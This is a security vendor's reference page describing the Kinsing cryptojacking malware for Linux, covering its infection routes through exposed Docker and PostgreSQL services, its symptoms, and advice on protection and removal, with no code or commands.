Beklager, innholdet på denne siden ikke tilgjengelig på språket du ønsker.
Hjem Kinsing

Kinsing

Category: Malware

Type: Cryptojacking malware/Worm 

Platform: Linux

Variants: Multiple evolving versions with rootkit and mining capabilities

Damage potential: Mines cryptocurrency by exploiting misconfigured Docker and PostgreSQL services, consumes system resources, spreads laterally, and hides presence using rootkits to evade detection.

Overview

Discovered in late 2019 and gaining attention in early 2020, Kinsing is a malware family primarily targeting Linux environments, especially cloud-native infrastructures and containerized applications. It functions as a cryptojacking tool that mines cryptocurrency, typically Monero, while maintaining persistent access to infected systems.

Kinsing employs lateral movement techniques to spread across networks and uses rootkits to hide its presence, so it’s difficult to detect or remove it. Kinsing also removes competing malware and optimizes infected systems for mining operations.

Cybercriminals use Kinsing to exploit misconfigurations and vulnerabilities in Linux-based cloud and container platforms. Their goal is to maximize illicit cryptocurrency mining and maintain control over compromised hosts. Kinsing evolves constantly and relies on stealth capabilities, which makes it a persistent threat in modern Linux ecosystems.

Possible symptoms

Kinsing may degrade system performance and compromise system integrity by running resource-intensive cryptocurrency mining processes and hiding malicious activity. Symptoms of a Kinsing infection include:

  • Sluggish or unresponsive system performance.
  • Unusual network activity or unexpected outbound connections to unknown IP addresses.
  • Increased CPU or memory usage due to mining operations.
  • Unknown or suspicious processes running on the system, often with names mimicking legitimate services.
  • Presence of hidden files or libraries loaded via user-mode rootkits.
  • Removal or disabling of competing malware and resource-heavy services.
  • Difficulty detecting or terminating malicious processes due to rootkit-based hiding techniques.
  • Suspicious activity related to Docker containers or PostgreSQL services.

Sources of the infection

Cybercriminals use several methods to spread the Kinsing malware:

  • Exploiting misconfigurations and vulnerabilities. Kinsing targets misconfigured Docker Daemon APIs, open or unsecured PostgreSQL instances, and other exposed cloud-native services to gain initial access without authentication.
  • Scanning for vulnerable hosts. After infection, Kinsing scans networks for other exposed services and systems that it can compromise to expand its reach laterally.
  • Direct exploitation of exposed APIs. Kinsing leverages unsecured Docker APIs and other services to deploy its payloads remotely, bypassing traditional perimeter defenses.
  • Use of automated scripts. The malware employs shell scripts to automate installation, mining setup, rootkit deployment, and removal of competing processes.
  • No need for user interaction. Kinsing does not require users to open files or click links — it exploits exposed services and network misconfigurations to infect systems automatically.

Protection

The best way to protect against Kinsing is to secure cloud and Linux environments by addressing common misconfigurations and vulnerabilities. Effective measures to protect against Kinsing include:

  • Using antivirus and anti-malware software. Install and regularly update reliable security solutions that include detection for Linux-based malware and cryptojacking threats.
  • Regularly updating systems and software. Keep your operating system, container platforms, and all applications up to date to patch vulnerabilities that Kinsing exploits, such as exposed Docker APIs and unsecured PostgreSQL instances.
  • Improving network security. Configure firewalls, intrusion detection systems, and endpoint protection to restrict access to exposed services and block suspicious outbound traffic to C2 servers.
  • Restricting access to Docker and database APIs. Limit and secure Docker Daemon API and database ports to authorized users only, preferably via authentication, network segmentation, or VPNs.
  • Disabling unnecessary services. Turn off any unused or unnecessary network services, container APIs, or database instances to reduce attack surfaces.
  • Implementing multi-factor authentication (MFA). Use MFA to protect critical administrative accounts and cloud infrastructure to prevent unauthorized access.
  • Monitoring system and network activity. Use logging and monitoring tools to detect unusual CPU usage, network connections, or hidden processes that may indicate cryptomining or rootkit activity.
  • Using container security best practices. Regularly scan container images for vulnerabilities, enforce least privilege, and apply runtime protection to detect and block suspicious behavior.

Removal of Kinsing

If you suspect Kinsing has infected your system, immediately isolate the affected device from the network to stop lateral movement. Identify and terminate suspicious processes, especially those related to mining and rootkits.

Use trusted Linux-compatible antivirus or malware removal tools to scan and clean the system. Manually check for and remove malicious scripts, rootkit components, and unauthorized Docker containers or services.

After removal, update all software, container platforms, and security configurations to close exploited vulnerabilities. Review access controls on Docker APIs and databases to prevent reinfection.

If you cannot fully remove Kinsing or the rootkits persist, seek help from cybersecurity experts for thorough remediation.